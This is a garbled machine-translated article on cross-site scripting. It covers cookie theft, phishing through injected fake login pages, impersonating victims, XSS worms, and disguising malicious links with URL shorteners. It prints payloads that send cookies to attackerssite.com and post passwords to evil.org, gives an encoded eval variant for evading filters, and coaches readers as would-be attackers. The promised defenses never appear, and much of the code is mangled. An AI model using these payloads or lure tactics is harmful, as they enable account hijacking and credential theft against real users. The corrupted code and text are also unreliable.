In-depth analysis of cross-site scripting attacks: Cross-Site hazards and cookie Theft

The name of a Cross-Site Script originates from the fact that a Web site (or person) they can inject their selected code across the security line into another different, vulnerable Web site. When the injected code is executed in the victim's browser as the code of the target site, attackers can steal the sensitive data and force the user to do unintended tasks.
In the previous article, we detailed the process of cross-site scripting vulnerability exploitation and in-depth analysis of HTML injection. This article will introduce the dangers of Cross-Site Scripting in detail, and how attackers trick victims. Finally, we will introduce defense measures against cross-site scripting attacks.

I. hazards of Cross-Site Scripting

XSS is an attack on Web application users. Attackers can dress up as attacked users to completely control Web applications, even if the Web application is behind a firewall and attackers cannot directly access the Web application. XSS generally does not cause damage to users' machines or directly damage Web application servers. If successful, attackers can do three things:

Cookie Theft

Impersonate Web applications in front of compromised users

Impersonate victim users in front of Web Applications

Ii. Cookie Theft

Cookies generally control access to Web applications. If attackers steal cookies from compromised users, they can use cookies of victims to completely control their accounts. For Cookie, the best practice is to make it expire after a period of time, so that attackers can only access the victim's account within a limited period of time. You can use the following code to steal cookies:

Var x = new Image (); x. src = http://attackerssite.com/eatMoreCookies? C =

+ Document. cookie;

Or as follows:

Document. write ("

 

"? C = "+ document. cookie +"> "〉");

 

If some characters are not allowed, convert them to the ASCII decimal number and use the String. charFromCode () function of JavaScript. The following JavaScript is equivalent to the previous JavaScript:

Eval (String. charFromCode (110,101,119, 109,

97,103,101, 59,120, 46,115,114, 39,104,116,116,112, 47,

97,116,116, 107,101,114,115,115,105,116,101, 111,109, 47,

111,114,101, 97, 67,111,111,107,105,101,115, 43,

100,111, 99,117,109,101,110,116, 111,111,107,105,101, 59 ));

Iii. Phishing Attacks

Attackers can use XSS for social engineering by using fake Web applications. After XSS attacks, attackers can completely control the appearance of Web applications. This can be used to target the web. For example, attackers can place a boring image on the page. One of the common images suitable for printing is Stall0wn3d, which means you are hacked.

The following is an HTML injection string for this attack:

<Script> document. body. innerHTML ="
Src = http://www.bkjia.com/uploads/allimg/131121/2211322534-0.jpg> "; </Script>
<Script> document. body. innerHTML = "

 

Src = http://www.bkjia.com/uploads/allianz 131121/2211322534-0.jpg> "; </script> 〉.

 

However, controlling the appearance of Web applications in front of compromised users is more advantageous than simply displaying some hot heat maps. Attackers can launch phishing attacks to force users to provide confidential information to attackers. Use document. body. innerHTML provides a login page that looks exactly the same as the login page of a vulnerable Web application, and the login page comes from the domain injected with HTML, but when submitting the form, the data is sent to the site selected by the attacker.

Therefore, when the victim enters his or her username and password, the information will fall into the attacker's hands. The Code is as follows:

Document. body. innerHTML = "

Action = http://evil.org/grabPasswords method = get> 〉

<P> User name: <input type = text name = u> <p> Password <input type = password

Name = p> <input type = submit name = login> </form> 〉";

One tips for using this code is to send a form through a GET request. In this way, attackers do not even need to write grabPasswords pages, because the request will be written to the error message log of the Web server, and the information here can be easily read.

4. Impersonating victims

The biggest impact of XSS on Web applications is that hackers can use it to impersonate legitimate users of Web applications. The following are some things that attackers can do to Web applications:
In a webmail application, attackers can:

Send email in the name of the user

Obtain the user's contact list

Change automatic BCC attributes

Change privacy/logging settings

In Web-based instant messaging or chat software, attackers can:

Get contact list

Send messages to contacts

Add/delete contacts

In a Web-based online banking or financial system, attackers can:

Withdrawal of funds

Apply for a credit card

Change address

In the E-commerce system, attackers can:

Purchased items

Every time we analyze the impact of XSS on the site, let's think about what it will do if he controls the victim's mouse and keyboard. Consider what the victim's computer in the victim's Intranet can do. To impersonate users, attackers need to understand how Web applications work. Sometimes, you can achieve this by reading the page source code, but the best way is to use a Web Proxy, such as Burp Suite, WebScarab, or Paros Proxy.

These web proxies intercept all communication data between the Web browser and the Web server, and even include traffic transmitted over HTTPS. You can record these sessions to understand that the Web application sends back data to the server. This is very helpful for figuring out how to impersonate the application. In addition, web Proxy is also very helpful for discovering XSS and other Web application vulnerabilities.

V. XSS Worm

Web applications that have been online all the time, such as webmail, social networks, chat rooms, online multiplayer games, online casinos, and all Web applications that require user interaction and send some form of information between users, are vulnerable to XSS worms. The XSS worm makes full use of the characteristics of Web applications from my propagation. For example, XSS worms in Webmail allow attackers to capture the contact list of victims and send emails.

When the victim clicks the link pointing to HTML injection, XSS is activated, which triggers script execution. The script searches for the contact list of the victim and then sends an email to each contact in the contact list of the victim. Each contact will receive an email from a reputable sender (victim), which invites the contact to click some links. Once he clicks the link, the contact will become another victim, and his contact will receive a letter from him.

The XSS worm breeds at an extremely fast speed. It can infect many users in a short period of time and cause a large amount of network traffic. It is very effective for spreading other attacks, such as phishing attacks. More interestingly, Attackers sometimes add hidden HTML content to Web applications to launch multiple attacks on browsers. If the Web browser running by a user is not up-to-date, attackers can completely control the user's machine. In this example, XSS is used to transmit some other vulnerabilities.

The above section describes the dangers of cross-site scripting and how attackers trick victims.

6. Capturing victims

Now, we know how to find HTML injection points and what the attacker can do if he can enable the user to click the link pointing to the injected HTML. Sometimes, the injected HTML is activated during normal user interaction. That is to say, there are many effective methods. However, in general, attackers must enable the user to click the link pointing to the injected HTML code to activate the attack process. This section briefly discusses how to encourage victims to click a link.

Now we assume that you are an attacker. If you find it possible in http://search.engine.com/search? P = inject HTML and design a malicious script at http://evil.org/e.js. Now, you just need to try to get people to click on the following link:

Http://search.engine.com/search? P =

However, how many people will click the above link? Users who have a little understanding of computer knowledge can see at a glance that clicking the above link will certainly not be a good thing. Therefore, attackers need to make up the link and then entice users to click something more attractive.

7. hidden links to injected HTML

You can use different methods to conceal links, such as through the anchor tag, using URLs to shorten technical sites, blogs, and websites controlled by attackers.

The first suggestion is very simple. Most Web applications automatically encapsulate the anchor tag around the URL so that users can follow the link. If an attacker can write his own hyperlink, such as in a webmail application, the attacker can construct a link as follows:

Http://goodsite.com/cuteKittens.jpg

This link serves as a response (that is, the attacker actually clicks the HTML injected by the attacker ).

Web applications used to shorten URLs, such as TinyURL, YATUC, ipulink.com, get-shorty.com (and all websites implementing the get-shorty function), can convert lengthy URLs into short URLs. These sites are implemented by ing URLs to a short URL and redirecting a short URL to a long URL.

Because a short URL is used to hide lengthy URLs, it is easier to gain the trust of people (or even some old computer users) and click malicious links. For example, for the following HTML injection that is easy to show:

Http://search.engine.com/search? P =

We can map it into a separate URL, as shown below:

Http://tinyurl.com/2optv9

Currently, few computer users with high vigilance know websites that provide URL shortening services for similar TinyURL. In this way, we can get more experienced computing through the less popular Web applications that provide URL shortening technology.